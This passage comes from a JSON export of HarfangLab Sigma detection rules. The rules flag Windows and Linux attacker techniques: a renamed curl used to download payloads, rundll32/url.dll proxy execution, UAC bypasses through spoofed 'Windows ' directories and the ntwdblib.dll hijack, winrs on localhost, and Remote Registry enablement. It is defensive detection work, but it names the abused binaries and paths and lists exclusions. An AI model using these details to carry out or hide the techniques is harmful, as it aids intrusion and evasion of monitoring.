"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7331ca01-b007-4859-8a9e-954ca5d68719",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619303Z",
"creation_date": "2026-03-23T11:45:34.619305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619309Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/003/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_suspicious_execution_renamed_curl.yml",
"content": "title: Suspicious Execution of Renamed cURL\nid: 7331ca01-b007-4859-8a9e-954ca5d68719\ndescription: |\n Detects the suspicious usage of a renamed cURL Windows binary.\n Attackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\n They may also try to rename or move the binary to evade security solutions.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\nreferences:\n - https://attack.mitre.org/techniques/T1036/003/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/12/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1036.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Curl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'curl.exe'\n\n filter_correct_name:\n Image|endswith:\n - '\\curl.exe'\n - '\\curl_x64.exe'\n - '\\curl_x86.exe'\n - '\\domotz_curl.exe'\n - '?:\\Program Files\\Windows Remote Agent\\URLDownloader.exe'\n - '?:\\Program Files (x86)\\Windows Remote Agent\\URLDownloader.exe'\n - '?:\\Program Files\\Talend *\\logserv\\utils\\curl-*.exe'\n - '?:\\ProgramFiles\\Talend*\\logserv\\utils\\curl-*.exe'\n\n exclusion_talend:\n ProcessGrandparentImage: '?:\\Program Files\\Talend *\\utils\\nssm.exe'\n Image: '?:\\Program Files\\Talend *\\logserv\\utils\\curl-*-windows-x86.exe'\n\n exclusion_lamexp:\n ProcessParentOriginalFileName: 'LameXP.exe'\n Image|endswith: '\\lxp_curl.exe'\n\n exclusion_checkpoint:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\curl_cli.exe'\n ProcessCommandLine|contains: 'unregConf.txt -o NUL -k --retry 5'\n ProcessParentImage:\n - '?:\\Windows\\system32\\msiexec.exe'\n - '?:\\Windows\\Syswow64\\msiexec.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7331ca01-b007-4859-8a9e-954ca5d68719",
"rule_name": "Suspicious Execution of Renamed cURL",
"rule_description": "Detects the suspicious usage of a renamed cURL Windows binary.\nAttackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\nThey may also try to rename or move the binary to evade security solutions.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\n",
"rule_creation_date": "2023-12-19",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.003",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73475251-0849-445c-bece-3e32ae43749d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598021Z",
"creation_date": "2026-03-23T11:45:34.598026Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598039Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Url/",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_url_proxy_execution.yml",
"content": "title: Proxy Execution via url.dll\nid: 73475251-0849-445c-bece-3e32ae43749d\ndescription: |\n Detects a suspicious invocation of url.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling url.dll's FileProtocolHandler or OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Url/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Url\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n\n selection_url:\n ParentCommandLine|contains:\n - ' url,'\n - ' url.dll,'\n\n selection_functions:\n ParentCommandLine|contains:\n - 'OpenURL'\n - 'FileProtocolHandler'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '\\Device\\HarddiskVolume*\\\\*\\Program Files\\'\n - '\\Device\\HarddiskVolume*\\\\*\\Program Files (x86)\\'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n exclusion_waterfox:\n Image|endswith: '\\waterfox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'BROWSERWORKS LTD'\n\n exclusion_comet:\n Image|endswith: '\\comet.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PERPLEXITY AI, INC.'\n\n exclusion_chrome:\n Image|endswith: '\\chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_misc_browser:\n - Image|endswith: '\\brave.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Brave Software, Inc.'\n - Image|endswith: '\\Application\\vivaldi.exe'\n - Image|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Opera Norway AS'\n - 'Opera Software AS'\n - Image|endswith: '\\Chromium\\thorium.exe'\n - Image|endswith: '\\SmartBrowser-Blink.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'OODRIVE S.A.S.'\n - Image|endswith:\n - '\\chromium\\chromium.exe'\n - '\\Chromium\\Application\\chrome.exe'\n - '\\GoogleChromePortable\\App\\Chrome-bin\\chrome.exe'\n - Image|endswith:\n - '\\jxbrowser\\chromium.exe'\n - '\\jxbrowser64\\chromium.exe'\n - ProcessOriginalFileName: 'zen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, OSCAR GONZALEZ MORENO'\n - Image|endswith: '\\MicrosoftEdgeCP.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_adobe:\n Image|endswith:\n - '\\AcroRd32.exe'\n - '\\Acrobat.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Inc.'\n - 'Adobe Systems, Incorporated'\n\n exclusion_vscode:\n Image|endswith: '\\Code.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_msh:\n ParentCommandLine|endswith: '.msh'\n Image|endswith: '\\gmsh.exe'\n\n exclusion_openwith:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\OpenWith.exe'\n - '?:\\Windows\\System32\\OpenWith.exe'\n\n exclusion_typora:\n ProcessSigned: 'true'\n ProcessSignature: 'Qiyun (Shanghai) Tech Ltd.'\n ProcessImage|endswith: '\\Typora.exe'\n\n exclusion_notepad:\n ProcessImage:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\Syswow64\\notepad.exe'\n\n exclusion_paint:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\syswow64\\mspaint.exe'\n\n exclusion_kingsoft:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Kingsoft\\WPS Office\\\\*\\office6\\wps.exe'\n\n exclusion_atlantisupdater:\n ParentCommandLine:\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createIconAssociation*AtlantisUpdater.reg'\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createIconAssociation*AtlantisUpdater.bat'\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createFileAssociation*AtlantisUpdater.bat'\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createFileAssociation*AtlantisUpdater.reg'\n\n exclusion_protocols:\n ParentCommandLine|contains:\n - 'FileProtocolHandler field6://'\n - 'FileProtocolHandler v3d3s://'\n\n exclusion_camunda:\n Image: '?:\\Users\\\\*\\AppData\\Roaming\\Camunda Modeler\\Camunda Modeler.exe'\n\n exclusion_sumatra_pdf:\n Image: '?:\\Users\\\\*\\AppData\\Local\\SumatraPDF\\SumatraPDF.exe'\n\n exclusion_foxit_reader:\n Signed: 'true'\n Signature: 'FOXIT SOFTWARE INC.'\n\n exclusion_excel:\n Image: '?:\\Microsoft Office\\Office16\\EXCEL.EXE'\n\n exclusion_docker:\n ProcessParentCommandLine|contains: 'FileProtocolHandler https://login.docker.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73475251-0849-445c-bece-3e32ae43749d",
"rule_name": "Proxy Execution via url.dll",
"rule_description": "Detects a suspicious invocation of url.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling url.dll's FileProtocolHandler or OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
"rule_creation_date": "2025-10-17",
"rule_modified_date": "2025-11-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7349845f-0229-4bb2-ab6b-a39f0dca1dc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618115Z",
"creation_date": "2026-03-23T11:45:34.618117Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618121Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e",
"https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_mocking_trusted_directories.yml",
"content": "title: UAC Bypass Executed via Mocking Trusted Directories\nid: 7349845f-0229-4bb2-ab6b-a39f0dca1dc5\ndescription: |\n Detects the execution of a binary from a Mocking Trusted Directories wich is a sign of an attempt of UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for malicious content or actions.\nreferences:\n - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n - https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/07/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith:\n - '?:\\Windows \\'\n - '?:\\ Windows\\'\n - '?:\\ Windows \\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7349845f-0229-4bb2-ab6b-a39f0dca1dc5",
"rule_name": "UAC Bypass Executed via Mocking Trusted Directories",
"rule_description": "Detects the execution of a binary from a Mocking Trusted Directories wich is a sign of an attempt of UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible to look for malicious content or actions.\n",
"rule_creation_date": "2021-07-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "734b213f-25e3-402d-862b-ccbe5a1166f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625861Z",
"creation_date": "2026-03-23T11:45:34.625863Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625868Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_winrs_local.yml",
"content": "title: Suspicious Execution on Localhost via Winrs\nid: 734b213f-25e3-402d-862b-ccbe5a1166f4\ndescription: |\n Detects a suspicious execution of Winrs.exe on a localhost, to possible execute malicious binaries.\n This binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to analyze the binary mentioned in the winrs command-line as well as the parent process to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - OriginalFileName: 'winrs.exe'\n - Image|endswith: '\\winrs.exe'\n\n selection_commandline:\n CommandLine|contains:\n - ' /remote:'\n - ' -remote:'\n - ' /r:'\n - ' -r:'\n\n selection_local:\n CommandLine|contains:\n - '127.0.0.1'\n - 'localhost'\n\n filter_user:\n CommandLine|contains:\n - '-u:localhost'\n - '-username:localhost'\n\n exclusion_inetum:\n CommandLine:\n - 'winrs -r:http://127.0.0.1:5985 *\\inetum\\\\*'\n - 'winrs -r:http://localhost:5985 *\\inetum\\\\*'\n\n exclusion_nexpublica:\n CommandLine|startswith:\n - 'winrs -r:http://127.0.0.1:5985 ?:\\Astre\\exploit\\\\*.cmd'\n - 'winrs -r:http://127.0.0.1:5985 ?:\\app\\exploit\\\\*.cmd'\n GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "734b213f-25e3-402d-862b-ccbe5a1166f4",
"rule_name": "Suspicious Execution on Localhost via Winrs",
"rule_description": "Detects a suspicious execution of Winrs.exe on a localhost, to possible execute malicious binaries.\nThis binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to analyze the binary mentioned in the winrs command-line as well as the parent process to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "735f553d-5066-4aed-96ae-b618b9999a75",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074456Z",
"creation_date": "2026-03-23T11:45:34.074458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074463Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.greyhathacker.net/?p=796",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_cliconfg_ntwdblib.yml",
"content": "title: UAC Bypass Executed via cliconfg.exe\nid: 735f553d-5066-4aed-96ae-b618b9999a75\ndescription: |\n Detects the execution of the cliconfg.exe UAC bypass, involving the hijacking of the ntwdblib.dll DLL.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\nreferences:\n - https://www.greyhathacker.net/?p=796\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/15\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\cliconfg.exe'\n ImageLoaded: '?:\\Windows\\System32\\ntwdblib.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "735f553d-5066-4aed-96ae-b618b9999a75",
"rule_name": "UAC Bypass Executed via cliconfg.exe",
"rule_description": "Detects the execution of the cliconfg.exe UAC bypass, involving the hijacking of the ntwdblib.dll DLL.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-15",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7365ba1c-29e1-4a14-8451-769ec6fc0393",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296893Z",
"creation_date": "2026-03-23T11:45:35.296896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296902Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_lastlog_linux.yml",
"content": "title: Lastlog Execution\nid: 7365ba1c-29e1-4a14-8451-769ec6fc0393\ndescription: |\n Detects the execution of lastlog, a command used to gather the last login times of all users.\n Adversaries may use it during the discovery phase to discover new users and services.\n The information provided by lastlog are read from \"/var/log/lastlog\".\n It is recommended to investigate the execution context as well as surrounding detections to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2023/12/15\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/lastlog'\n CommandLine: 'lastlog'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_qualys:\n Ancestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_hp:\n ParentImage: '/opt/OV/lbin/eaagt/opcmona'\n\n exclusion_lsagent:\n ParentCommandLine|contains: \"sh -c lastlog | grep -v '*Never logged in'; printf \"\n GrandparentImage: '/usr/sbin/sshd'\n\n exclusion_cockpit:\n - ParentImage: '/usr/bin/cockpit-bridge'\n - GrandparentImage: '/usr/libexec/cockpit-session'\n\n exclusion_sosreport:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine|contains:\n - ' /usr/sbin/sosreport'\n - ' /sbin/sosreport'\n - ' /usr/sbin/sos report'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n - '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7365ba1c-29e1-4a14-8451-769ec6fc0393",
"rule_name": "Lastlog Execution",
"rule_description": "Detects the execution of lastlog, a command used to gather the last login times of all users.\nAdversaries may use it during the discovery phase to discover new users and services.\nThe information provided by lastlog are read from \"/var/log/lastlog\".\nIt is recommended to investigate the execution context as well as surrounding detections to determine if this action was legitimate.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-02-25",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "736eb5a5-5ffc-4053-ab85-8177f25877ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621184Z",
"creation_date": "2026-03-23T11:45:34.621186Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621190Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/",
"https://car.mitre.org/analytics/CAR-2014-11-005/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_remote_registry_enabled.yml",
"content": "title: Remote Registry Service Enabled via Registry\nid: 736eb5a5-5ffc-4053-ab85-8177f25877ae\ndescription: |\n Detects when the Remote Registry Service is enabled via a registry modification.\n This service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\n An adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\n It can be used by an attacker to prepare a lateral movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\n It is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\nreferences:\n - https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/\n - https://car.mitre.org/analytics/CAR-2014-11-005/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/09/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\RemoteRegistry\\Start'\n\n filter_disabled:\n Details: 'DWORD (0x00000004)' # SERVICE_DISABLED\n\n # This is handled by the rule 6624dc1b-2cc0-4936-b502-8f6ec161ba8e\n # This anoter rule allows to identify the real process enabling the 